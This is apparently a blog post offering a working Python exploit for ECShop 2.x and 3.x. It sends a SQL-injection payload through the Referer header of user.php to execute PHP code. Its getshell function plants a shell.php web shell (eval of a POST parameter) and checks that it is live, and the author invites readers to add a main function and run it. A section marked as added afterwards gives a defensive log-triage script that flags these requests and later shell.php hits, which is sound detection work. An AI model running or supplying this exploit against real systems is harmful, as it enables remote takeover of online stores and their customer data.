ECShop v2 / v3 EXP usage: code example
灵槐 | 2024-12-26 10:53:54 | ECShop store tutorials
import requests
import binascii


def get_v2Payload(code):
    '''Ecshop V2.x payload'''
    code = "{$abc'];@assert(%s);//}" % (code)
    # print(code)
    code = code.encode()
    shellcode = binascii.hexlify(code).decode()
    payload = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}554fcae493e564ee0dc75bdf2ebf94ca" % ((50 + len(shellcode)), shellcode)
    return payload


def get_v3Payload(code):
    '''Ecshop V3.x payload'''
    code = "{$abc'];assert(%s);//}" % (code)
    code = code.encode()
    shellcode = binascii.hexlify(code).decode()
    payload = "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}45ea207d7a2b68c49582d2d22adf953a" % ((50 + len(shellcode)), shellcode)
    return payload


def verify(url):
    print(url)
    flag = "allow_url_include"
    code = "phpinfo()"
    url = url + "/user.php"
    ec2payload = get_v2Payload(code)
    # print(ec2payload)
    ec3payload = get_v3Payload(code)
    payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
    for payload, version in payloads:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
            'Referer': payload
        }
        try:
            rsp = requests.get(url, headers=headers, timeout=3)
            if flag in rsp.text:
                verifyInfo = {}
                verifyInfo['URL'] = url
                verifyInfo['version'] = version
                print(verifyInfo)
                break
        except:
            pass


def getshell(url):
    code = "base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3NoZWxsLnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzc3N10pOyA/Picp')"
    i = url + "/user.php"
    ec2payload = get_v2Payload(code)
    # print(ec2payload)
    ec3payload = get_v3Payload(code)
    payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
    for payload, version in payloads:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
            'Referer': payload
        }
        try:
            rsp = requests.get(i, headers=headers, timeout=5)
            if rsp.status_code == 200:
                shurl = url + "/shell.php"
                srsp = requests.get(shurl, timeout=5)
                if srsp.status_code == 200:
                    verifyInfo = {}
                    verifyInfo['URL'] = shurl
                    verifyInfo['version'] = version
                    print(verifyInfo)
                    break
        except:
            pass
That is roughly what it looks like; to actually use it, just add a main function yourself.
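For defenders, the Referer value built by get_v2Payload/get_v3Payload has a distinctive shape that is easy to find in web access logs. The following is an added example, not part of the original post: it assumes Apache/nginx combined-format logs, and the function names (triage, followups) and the sample log lines are constructed for illustration.

```python
import re

# Apache/nginx "combined" log format; the Referer may hold escaped quotes (\" or \x22).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:\\.|[^"\\])*)"')
# 32 hex chars + "ads|" + a PHP-serialized array: the Referer shape the script builds.
MARKER_RE = re.compile(r'[0-9a-f]{32}ads\|a:\d+:\{', re.I)
# Hex literal in the 9th UNION SELECT column, which carries the injected code.
HEX_RE = re.compile(r',0x((?:[0-9a-f]{2})+),10', re.I)

# Constructed sample lines (documentation IPs; the hex decodes to the harmless "phpinfo()").
SAMPLE = r'''203.0.113.7 - - [26/Dec/2024:10:00:01 +0000] "GET /user.php HTTP/1.1" 200 5120 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:68:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x706870696e666f2829,10-- -\";s:2:\"id\";s:4:\"' /*\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0"
203.0.113.7 - - [26/Dec/2024:10:00:03 +0000] "GET /shell.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
198.51.100.4 - - [26/Dec/2024:10:01:00 +0000] "GET /user.php?act=login HTTP/1.1" 200 8300 "https://shop.example/index.php" "Mozilla/5.0"
'''.splitlines()


def triage(lines):
    """Return one finding per user.php request whose Referer matches the marker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m['path'].split('?')[0].endswith('/user.php'):
            continue
        if not MARKER_RE.search(m['referer']):
            continue
        hx = HEX_RE.search(m['referer'])
        # Decode the hex column so the responder sees what the request tried to run.
        decoded = bytes.fromhex(hx.group(1)).decode('latin-1') if hx else None
        findings.append({'ip': m['ip'], 'status': int(m['status']), 'injected': decoded})
    return findings


def followups(lines, ips, name='/shell.php'):
    """Successful requests from flagged IPs for the file name the script probes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m['ip'] in ips and m['path'].endswith(name) and m['status'] == '200':
            hits.append((m['ip'], m['path']))
    return hits


if __name__ == '__main__':
    found = triage(SAMPLE)
    print(found)
    print(followups(SAMPLE, {f['ip'] for f in found}))
```

A hit from followups means a file with that name was served with status 200 to a flagged client, so the host should be treated as compromised and the file collected for forensics rather than just deleted.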